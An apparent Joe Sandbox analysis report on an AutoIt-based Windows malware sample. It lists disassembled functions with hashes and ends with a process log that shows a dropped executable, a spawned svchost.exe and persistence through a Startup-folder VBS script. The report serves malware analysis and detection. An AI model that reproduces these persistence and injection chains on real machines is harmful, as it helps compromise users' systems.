Instruction ID: fa11b5cf22c88d02201a068dbd63007e2309bbde98d56ed2c8edd5a8bb1413da
Opcode Fuzzy Hash: 7318cadf632499e8189b08618e2d78f57a29e576389fd2a7e9ffd89cf568127a
Instruction Fuzzy Hash: 711129B2610209AFDB01DFA8CC86EFA7BB8EB49354F004614F955E2250E739E8519B60

Function 0078CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0078CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0078CDA6

Strings

<local>, xrefs: 0078CD66

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 23eb1ed9570b4faf8ac2c9f75059824465fe3ec9d6ae3f43da1040af5018cedf
Instruction ID: 463f4eb878316899dff3e79c4896166dad6c4f5176253fcb105cad196e519cde
Opcode Fuzzy Hash: 23eb1ed9570b4faf8ac2c9f75059824465fe3ec9d6ae3f43da1040af5018cedf
Instruction Fuzzy Hash: 1611C6713856317AD7367B668C45EE7BEACEF527A4F004226B10983180D7789841D7F0

Function 007A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007A34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007A34BA

Strings

edit, xrefs: 007A348F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e71a227a7ef31687f4dd8a09dae123b879fb3b4b8470097b344812b7c8541f31
Instruction ID: 90f656930551082b4b119faeb003ef4396a43ba512ccabcb60a0e474a0b5e277
Opcode Fuzzy Hash: e71a227a7ef31687f4dd8a09dae123b879fb3b4b8470097b344812b7c8541f31
Instruction Fuzzy Hash: F7118F71500248AFEB128E64DC44AFB376AEB8A374F504324F961971D0C779DC919B55

Function 00776C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

CharUpperBuffW.USER32(?,?,?), ref: 00776CB6
_wcslen.LIBCMT ref: 00776CC2

Strings

STOP, xrefs: 00776CBC, 00776CC1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 0c658878bc2227d62ee7b7e33d2240da21765c3a5a5fcaeaabd4628da8e8e0bb
Instruction ID: 24ed70f7f630d64623b533327e4a6c6a7677b8696e8339268bb5f2c678f05bcb
Opcode Fuzzy Hash: 0c658878bc2227d62ee7b7e33d2240da21765c3a5a5fcaeaabd4628da8e8e0bb
Instruction Fuzzy Hash: F00104326109268BCF21AFBDCC959BF73B4EB61790B104924E95696198EB39E940C660

Function 00771CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00771D4C

Strings

ListBox, xrefs: 00771D16
ComboBox, xrefs: 00771CEB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2445998dfe2291e4ad6db3ef12535f27a3db37a321a6fb3532619ee70f0a8c9c
Instruction ID: 69c92790b0bcb1104e06ef9ac6d4481c8ffb5b46439baf49c7dd1f8b68c2fa46
Opcode Fuzzy Hash: 2445998dfe2291e4ad6db3ef12535f27a3db37a321a6fb3532619ee70f0a8c9c
Instruction Fuzzy Hash: 4F01B571701214ABCF14EBA8CC56DFE7368EB463D0B44491AB976673C1EA3859099B60

Function 00771BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00771C46

Strings

ListBox, xrefs: 00771C10
ComboBox, xrefs: 00771BE5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: a68396ff686554c1f5e46b75b2af2646e5abaaba08c942f6bdc6bd2bba1f6165
Instruction ID: 129d64a83cb6244f6c32aab7bddae2157c9f5daaea8f72d32fc551fe87b6367a
Opcode Fuzzy Hash: a68396ff686554c1f5e46b75b2af2646e5abaaba08c942f6bdc6bd2bba1f6165
Instruction Fuzzy Hash: 7701FCB1740104A7CF05EBE8C966DFF73A89B113C0F604016B91A772C1EA2C9F0897B1

Function 00771C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00771CC8

Strings

ListBox, xrefs: 00771C94
ComboBox, xrefs: 00771C69

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 365ce1cf0b631a3c2b79e0c81dbc55dd4220c5084aaae413a4452ba398f250ec
Instruction ID: da9a49bf8b4d7ed003c0939d17457ca0d2e050432408e79c4e1d7c123339ac3a
Opcode Fuzzy Hash: 365ce1cf0b631a3c2b79e0c81dbc55dd4220c5084aaae413a4452ba398f250ec
Instruction Fuzzy Hash: 4C01DBB1640114A7CF05EBE8CA16EFE73A89B113C0F544016B946732C1EA2C9F19D7B1

Function 0072A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0072A529

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Strings

,%~, xrefs: 0072A509
3yv, xrefs: 0072A545, 0072A54D, 0072A552

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%~$3yv
API String ID: 2551934079-3390321579
Opcode ID: ee2aa26224e47d9ae238ad3786868a8a9e1245bf8711ec701377a42423b699ae
Instruction ID: f405149cb9050602bf3e4342352e4b433efcf8b53462caaf1f6788e99cc0f2ae
Opcode Fuzzy Hash: ee2aa26224e47d9ae238ad3786868a8a9e1245bf8711ec701377a42423b699ae
Instruction Fuzzy Hash: CE012B32701664EBD604F77DE86FA9E7368DB09710F400068FA025B1C3EE5C9D528AD7

Function 00771D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00771DD3

Strings

ListBox, xrefs: 00771DA0
ComboBox, xrefs: 00771D75

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4894366624a81e99c17e0deba0711032210ff34f1198b7586982ca8d269735fd
Instruction ID: c34d5a896fa642456b8fd4cae93da0570fb5490ccf379cceb70a5102b0b8e3d4
Opcode Fuzzy Hash: 4894366624a81e99c17e0deba0711032210ff34f1198b7586982ca8d269735fd
Instruction Fuzzy Hash: A3F0A4B1B41214A7DF14EBA8CC66FFE7778AB02390F440916B966632C1DA685A0987B0

Function 007A8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007E3018,007E305C), ref: 007A81BF
CloseHandle.KERNEL32 ref: 007A81D1

Strings

\0~, xrefs: 007A818A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0~
API String ID: 3712363035-4061946894
Opcode ID: 5729a2ea275749d0f49f96b11ad2740093a3c3997819acb68cfbc56149204c7d
Instruction ID: 4e35c462da9ddf2d1b9476e6a7bf69fe21d82da324afbb4fcc5ebea9d1432271
Opcode Fuzzy Hash: 5729a2ea275749d0f49f96b11ad2740093a3c3997819acb68cfbc56149204c7d
Instruction Fuzzy Hash: 01F054B1641354BAF6206761AC4DFB73A5DDB09750F008461BB08DA1A2D67D8A0082BD

Function 0079747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00797493
_wcslen.LIBCMT ref: 007974B9

Strings

3, 3, 16, 1, xrefs: 00797483

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: bb540ef7a9207bf98e9b4d026d40d979086a4606e85ce9f5ea8cbfe8531bdfae
Instruction ID: 332c9b4072a4b9f4be3bbb043835d7c53d6003edd04b41341b1729bc571e8672
Opcode Fuzzy Hash: bb540ef7a9207bf98e9b4d026d40d979086a4606e85ce9f5ea8cbfe8531bdfae
Instruction Fuzzy Hash: 5BE02B422242A060A73D1279BCC5B7F5789CFC9760B14182BF985C2277EA9CAD91D3A0

Function 00770B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00770B23

Strings

AutoIt, xrefs: 00770B17
Error allocating memory., xrefs: 00770B1C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 819bd0cd2753f949a533c43ceb1226938407749888c87a0a224d72f12b27ebaf
Instruction ID: 3831991b6418f235d5b1f65dc34bfb0320a7b429187b51b34f2e199cffee67f0
Opcode Fuzzy Hash: 819bd0cd2753f949a533c43ceb1226938407749888c87a0a224d72f12b27ebaf
Instruction Fuzzy Hash: 96E0D871384318B6D21537547C0BF897A948F06B60F104477F748555C38EE9789046E9

Function 00730D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0072F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00730D71,?,?,?,0071100A), ref: 0072F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0071100A), ref: 00730D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0071100A), ref: 00730D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00730D7F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 92915eb79251d266fd433f26656644407375c4b3f8d713728bb1add795f49f67
Instruction ID: 15e84ceb889e70ac65a57bc85efc55f0a0d91d75a1c319ef4d23671f6945dee6
Opcode Fuzzy Hash: 92915eb79251d266fd433f26656644407375c4b3f8d713728bb1add795f49f67
Instruction Fuzzy Hash: 5EE06D702003518BE3209FBCE8183467BE0BB05740F008A3DE482C6692DBBCE4848BD1

Function 0072E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0072E3D5

Strings

8%~, xrefs: 0072E3CA
0%~, xrefs: 0072E3B5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%~$8%~
API String ID: 1385522511-2129309850
Opcode ID: 5c7d60a4a052f815c9db1d0352c9ebcd1a8e1711903adc8b26cbf13de5b59c84
Instruction ID: 35b48ed76a4d41f1d959aec5dc0e07f949a05d8caa7cf9f28ab6f7bfde5dc701
Opcode Fuzzy Hash: 5c7d60a4a052f815c9db1d0352c9ebcd1a8e1711903adc8b26cbf13de5b59c84
Instruction Fuzzy Hash: 92E0863141AAB4CBD604D718BAA9A8C3359AB0D321B5051F9E1128B1D7DBBC28538699

Function 00783017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0078302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00783044

Strings

aut, xrefs: 00783038

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: eb847fd4353cb9bd0810b029664d860a393e1454bbc85891bcc0aa76e21d8fd7
Instruction ID: cbf477f88187c79d9d3513cbaf59f1be68f4653570ae434bcd81ae533c06db59
Opcode Fuzzy Hash: eb847fd4353cb9bd0810b029664d860a393e1454bbc85891bcc0aa76e21d8fd7
Instruction Fuzzy Hash: D9D05B7150031477DA2097949D0DFC73B6CD745750F0041527655D60D1DAB49544CAD4

Function 0076D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0076D220

Strings

X64, xrefs: 0076D2A8
%.3d, xrefs: 0076D22B

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: a552ed99f5cb52c4b628b71519f9491e361a476781d01d07ff585ed2f985b3aa
Instruction ID: bea029d3b8c51399cbb27f3f30ca628d851bd635dcfd33f0c7dddd04998681f1
Opcode Fuzzy Hash: a552ed99f5cb52c4b628b71519f9491e361a476781d01d07ff585ed2f985b3aa
Instruction Fuzzy Hash: F4D017A1D18158EECBB096E0DC599BAB3BCBB08301F608462FD07A2040E73CCD08AB61

Function 007A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A236C
PostMessageW.USER32(00000000), ref: 007A2373

Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3

Strings

Shell_TrayWnd, xrefs: 007A2365

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: cc2eb4b37515c78ead3de7c3a44e6c04d111af179e59818920acb7cd5ba2dfe1
Instruction ID: 622d9ce911a18c805707ce4a5be124e237ed1f35294dc1eabb9c8d22f34bf8d0
Opcode Fuzzy Hash: cc2eb4b37515c78ead3de7c3a44e6c04d111af179e59818920acb7cd5ba2dfe1
Instruction Fuzzy Hash: 35D012727C1310BBE665B770DC0FFC676149B56B10F1089567755EA1D0C9F8B801CA58

Function 007A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007A233F

Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3

Strings

Shell_TrayWnd, xrefs: 007A2325

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 3f2ea37b47192f890c700f16b84d0a1c43774ec8507bda8869f77ee514fa8438
Instruction ID: d162387247c83c955cb3b0aa8cd0b9108e651f9b138c9ec3e724971fee013fc8
Opcode Fuzzy Hash: 3f2ea37b47192f890c700f16b84d0a1c43774ec8507bda8869f77ee514fa8438
Instruction Fuzzy Hash: 9FD01276794310F7E664B770DC0FFC67A149B55B10F1089567759AA1D0C9F8B801CA58

Source: unknown	Process created: C:\Users\user\Desktop\9876567899.bat.exe "C:\Users\user\Desktop\9876567899.bat.exe"
Source: C:\Users\user\Desktop\9876567899.bat.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\Desktop\9876567899.bat.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
